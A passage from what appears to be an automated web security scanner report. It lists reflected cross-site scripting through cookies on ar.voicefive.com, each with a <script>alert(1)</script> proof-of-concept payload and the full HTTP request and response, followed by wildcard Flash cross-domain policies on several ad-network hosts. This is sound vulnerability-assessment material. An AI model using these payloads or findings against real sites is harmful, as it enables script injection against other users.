COMSCORE.BMX.Buddy.ServerTimeEpoch="1308010656";COMSCORE.BMX.Buddy.start(({"Config":{"ControlList":[{Pid:"p79727471",RecruitFrequency:0,Inv:"mtv_300x250",Version:3}],"MasterSettings":{"GlobalCook
...[SNIP]...

3.70. http://ar.voicefive.com/bmx3/node.pli [ar_p82806590 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 17aab<script>alert(1)</script>be6c6e68589 was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&17aab<script>alert(1)</script>be6c6e68589; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&17aab<script>alert(1)</script>be6c6e68589', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:
...[SNIP]...

3.71. http://ar.voicefive.com/bmx3/node.pli [ar_p84552060 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload 5ba0f<script>alert(1)</script>1268b518d38 was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&5ba0f<script>alert(1)</script>1268b518d38; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:34 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&5ba0f<script>alert(1)</script>1268b518d38', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2
...[SNIP]...

3.72. http://ar.voicefive.com/bmx3/node.pli [ar_p91143664 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p91143664 cookie is copied into the HTML document as plain text between tags. The payload 6f37c<script>alert(1)</script>327ede0648b was submitted in the ar_p91143664 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&6f37c<script>alert(1)</script>327ede0648b; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:33 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=1308010528', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&6f37c<script>alert(1)</script>327ede0648b', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&' };
COMSCORE.BMX.Buddy.ServerTimeEpoch="1308010653";COMSCORE.BMX.Budd
...[SNIP]...

3.73. http://ar.voicefive.com/bmx3/node.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 1a430<script>alert(1)</script>0390c9245 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&1a430<script>alert(1)</script>0390c9245; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:34 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16066

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&1a430<script>alert(1)</script>0390c9245', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:3
...[SNIP]...

3.74. http://ar.voicefive.com/bmx3/node.pli [ar_p97464717 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p97464717 cookie is copied into the HTML document as plain text between tags. The payload 1ffeb<script>alert(1)</script>61108d79055 was submitted in the ar_p97464717 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&1ffeb<script>alert(1)</script>61108d79055; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
nReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Buddy.cookies={ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&1ffeb<script>alert(1)</script>61108d79055', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14
...[SNIP]...

4. Flash cross-domain policy  previous  next
There are 77 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://0.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:20:45 GMT
Expires: Tue, 14 Jun 2011 00:25:45 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://1.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:20:43 GMT
Expires: Tue, 14 Jun 2011 00:25:43 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.3. http://2.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://2.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 2.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:30:12 GMT
Expires: Tue, 14 Jun 2011 00:35:12 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.4. http://a.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.5. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Mon, 13 Jun 2011 14:11:24 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.6. http://ads.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:1722"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 14 Jun 2011 00:19:16 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.7. http://ar.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:16:22 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.8. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 14 Jun 2011 17:45:46 GMT
Date: Mon, 13 Jun 2011 17:45:46 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

